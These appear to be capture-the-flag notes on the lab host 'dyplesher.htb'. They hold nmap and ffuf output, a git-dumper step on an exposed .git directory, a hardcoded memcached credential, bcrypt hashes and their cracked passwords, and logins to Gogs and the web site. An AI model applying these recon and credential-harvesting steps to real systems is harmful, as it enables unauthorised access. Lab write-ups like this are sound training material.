Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-01 08:49 EDT
Nmap scan report for dyplesher.htb (10.10.10.190)
Host is up (0.050s latency).
Not shown: 65525 filtered ports
PORT      STATE  SERVICE    VERSION
22/tcp    open   ssh        OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
|   256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_  256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp    open   http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp  open   ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=5807b43f2b49a04b; Path=/; HttpOnly
|     Set-Cookie: _csrf=o1gVjYkgY41hmpLAoa_r0QHoCJY6MTU5NjI4NjM1OTAxOTE4NTgyOQ%3D%3D; Path=/; Expires=Sun, 02 Aug 2020 12:52:39 GMT; HttpOnly
|     Date: Sat, 01 Aug 2020 12:52:39 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="o1gVjYkgY41hmpLAoa_r0QHoCJY6MTU5NjI4NjM1OTAxOTE4NTgyOQ==" />
|     <meta name="_suburl" content="" />
|     <meta proper
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=2088964c778f8ea5; Path=/; HttpOnly
|     Set-Cookie: _csrf=bzFEWO9Sz2i6zgmZW-GT9rGf4X86MTU5NjI4NjM2NDMwMzM2MDE4OQ%3D%3D; Path=/; Expires=Sun, 02 Aug 2020 12:52:44 GMT; HttpOnly
|     Date: Sat, 01 Aug 2020 12:52:44 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="bzFEWO9Sz2i6zgmZW-GT9rGf4X86MTU5NjI4NjM2NDMwMzM2MDE4OQ==" />
|     <meta name="_suburl" content="" />
|_    <meta
4369/tcp  open   epmd       Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
5672/tcp  open   amqp       RabbitMQ 3.7.8 (0-9)
| amqp-info: 
|   capabilities: 
|     publisher_confirms: YES
|     exchange_exchange_bindings: YES
|     basic.nack: YES
|     consumer_cancel_notify: YES
|     connection.blocked: YES
|     consumer_priorities: YES
|     authentication_failure_close: YES
|     per_consumer_qos: YES
|     direct_reply_to: YES
|   cluster_name: rabbit@dyplesher
|   copyright: Copyright (C) 2007-2018 Pivotal Software, Inc.
|   information: Licensed under the MPL.  See http://www.rabbitmq.com/
|   platform: Erlang/OTP 22.0.7
|   product: RabbitMQ
|   version: 3.7.8
|   mechanisms: PLAIN AMQPLAIN
|_  locales: en_US
11211/tcp open   memcache?
25562/tcp open   unknown
25565/tcp open   minecraft?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, LPDString, SIPOptions, SSLSessionReq, TLSSessionReq, afp, ms-sql-s, oracle-tns: 
|     '{"text":"Unsupported protocol version"}
|   NotesRPC: 
|     q{"text":"Unsupported protocol version 0, please use one of these versions:
|_    1.8.x, 1.9.x, 1.10.x, 1.11.x, 1.12.x"}
25572/tcp closed unknown
25672/tcp open   unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.80%I=7%D=8/1%Time=5F256555%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,2063,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\
SF:x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=5807b43f2b49a04b;\x
SF:20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=o1gVjYkgY41hmpLAoa_r0QHoC
SF:JY6MTU5NjI4NjM1OTAxOTE4NTgyOQ%3D%3D;\x20Path=/;\x20Expires=Sun,\x2002\x
SF:20Aug\x202020\x2012:52:39\x20GMT;\x20HttpOnly\r\nDate:\x20Sat,\x2001\x2
SF:0Aug\x202020\x2012:52:39\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<hea
SF:d\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20conte
SF:nt=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-
SF:Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"
SF:\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20conten
SF:t=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/
SF:>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-host
SF:ed,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referr
SF:er\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"o1gVjYkgY41hmpLAoa_r
SF:0QHoCJY6MTU5NjI4NjM1OTAxOTE4NTgyOQ==\"\x20/>\n\t<meta\x20name=\"_suburl
SF:\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta\x20proper")%r(Help,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(H
SF:TTPOptions,189F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20t
SF:ext/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x20
SF:Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=2088964c778f8ea5;\x20P
SF:ath=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=bzFEWO9Sz2i6zgmZW-GT9rGf4X86
SF:MTU5NjI4NjM2NDMwMzM2MDE4OQ%3D%3D;\x20Path=/;\x20Expires=Sun,\x2002\x20A
SF:ug\x202020\x2012:52:44\x20GMT;\x20HttpOnly\r\nDate:\x20Sat,\x2001\x20Au
SF:g\x202020\x2012:52:44\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\x
SF:20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content=
SF:\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Com
SF:patible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x2
SF:0content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=\
SF:"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\n
SF:\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted,
SF:\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer\
SF:"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"bzFEWO9Sz2i6zgmZW-GT9rG
SF:f4X86MTU5NjI4NjM2NDMwMzM2MDE4OQ==\"\x20/>\n\t<meta\x20name=\"_suburl\"\
SF:x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25565-TCP:V=7.80%I=7%D=8/1%Time=5F256578%P=x86_64-pc-linux-gnu%r(DN
SF:SVersionBindReqTCP,2A,"\)\0'{\"text\":\"Unsupported\x20protocol\x20vers
SF:ion\"}")%r(DNSStatusRequestTCP,2A,"\)\0'{\"text\":\"Unsupported\x20prot
SF:ocol\x20version\"}")%r(SSLSessionReq,2A,"\)\0'{\"text\":\"Unsupported\x
SF:20protocol\x20version\"}")%r(TLSSessionReq,2A,"\)\0'{\"text\":\"Unsuppo
SF:rted\x20protocol\x20version\"}")%r(LPDString,2A,"\)\0'{\"text\":\"Unsup
SF:ported\x20protocol\x20version\"}")%r(LDAPSearchReq,2A,"\)\0'{\"text\":\
SF:"Unsupported\x20protocol\x20version\"}")%r(SIPOptions,2A,"\)\0'{\"text\
SF:":\"Unsupported\x20protocol\x20version\"}")%r(NotesRPC,74,"s\0q{\"text\
SF:":\"Unsupported\x20protocol\x20version\x200,\x20please\x20use\x20one\x2
SF:0of\x20these\x20versions:\n1\.8\.x,\x201\.9\.x,\x201\.10\.x,\x201\.11\.
SF:x,\x201\.12\.x\"}")%r(oracle-tns,2A,"\)\0'{\"text\":\"Unsupported\x20pr
SF:otocol\x20version\"}")%r(ms-sql-s,2A,"\)\0'{\"text\":\"Unsupported\x20p
SF:rotocol\x20version\"}")%r(afp,2A,"\)\0'{\"text\":\"Unsupported\x20proto
SF:col\x20version\"}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.41 seconds

################################################################################
foothold
################################################################################
  22/tcp    open   ssh        OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
  80/tcp    open   http       Apache httpd 2.4.41 ((Ubuntu))
  3000/tcp  open   ppp?
  4369/tcp  open   epmd       Erlang Port Mapper Daemon
  5672/tcp  open   amqp       RabbitMQ 3.7.8 (0-9)
  11211/tcp open   memcache?
  25562/tcp open   unknown
  25565/tcp open   minecraft?

  ------------------------------------------------------------------------------
  port 80:
  ffuf -w ~/wordlists/raft-large-directories.txt -u http://dyplesher.htb/FUZZ
    css
    img
    js
    register
    home
      add     
      players 
      console 
      delete  
      reset   
    fonts
    X - server-status
  ----------------------------------------------------------------------
  staff:
    http://dyplesher.htb:8080/arrexel
    http://dyplesher.htb:8080/felamos
    http://dyplesher.htb:8080/yuntao
  ----------------------------------------------------------------------
  O - login: real login page 
    dypleshero
  ----------------------------------------------------------------------
  test.dyplesher.htb:
    X - ffuf -w ~/wordlists/raft-large-directories.txt -u http://test.dyplesher.htb/FUZZ
      server-status
    X - <h1>Add key and value to memcache<h1>
      <FORM METHOD="GET" NAME="test" ACTION="">
      <INPUT TYPE="text" NAME="add">
      <INPUT TYPE="text" NAME="val">
      <INPUT TYPE="submit" VALUE="Send">
        "It's equal"....?:
          X - sqlmap
          X - manual sqli
    O - ffuf -w ~/wordlists/raft-large-files.txt -u http://test.dyplesher.htb/FUZZ
      .git so use ./git-dumper/git-dumper.py http://test.dyplesher.htb/.git snack/dyplesher/github
        - creds - $m->setSaslAuthData("felamos", "zxcvbnm");
        - use python3 package bmemcached to get memcached data (memcached.py)
          -guess that password is a key and get the cached values:
            -$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
            -$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
            -$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
              $2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1
              O - felamos:mommy1 works on the gogs site

  ----------------------------------------------------------------------
  http://dyplesher.htb:3000/
  ffuf -w ~/wordlists/raft-large-directories.txt -u http://dyplesher.htb:3000/FUZZ
    plugins                 [Status: 302, Size: 32, Words: 2, Lines: 3]
    js                      [Status: 302, Size: 27, Words: 2, Lines: 3]
    css                     [Status: 302, Size: 28, Words: 2, Lines: 3]
    admin                   [Status: 302, Size: 34, Words: 2, Lines: 3]
    img                     [Status: 302, Size: 28, Words: 2, Lines: 3]
    assets                  [Status: 302, Size: 31, Words: 2, Lines: 3]
    debug                   [Status: 200, Size: 160, Words: 18, Lines: 5]
    avatars                 [Status: 302, Size: 32, Words: 2, Lines: 3]
    issues                  [Status: 302, Size: 34, Words: 2, Lines: 3]
    explore                 [Status: 302, Size: 37, Words: 2, Lines: 3]
    healthcheck             [Status: 200, Size: 26, Words: 4, Lines: 2]

  O - you can register an account here!

----------------------------------------------------------------------
reset point...
felamos:mommy1 works on the gogs site
we download bundle files on the gitlab releases
we have 4 github sources now... use git clone /path/to/.bundle
    sqlite3 => .open users.db => select * from users:
      $2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6
        $2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6:alexis1
          works in http://dyplesher.htb/login
Now we need plugin and .jar file...
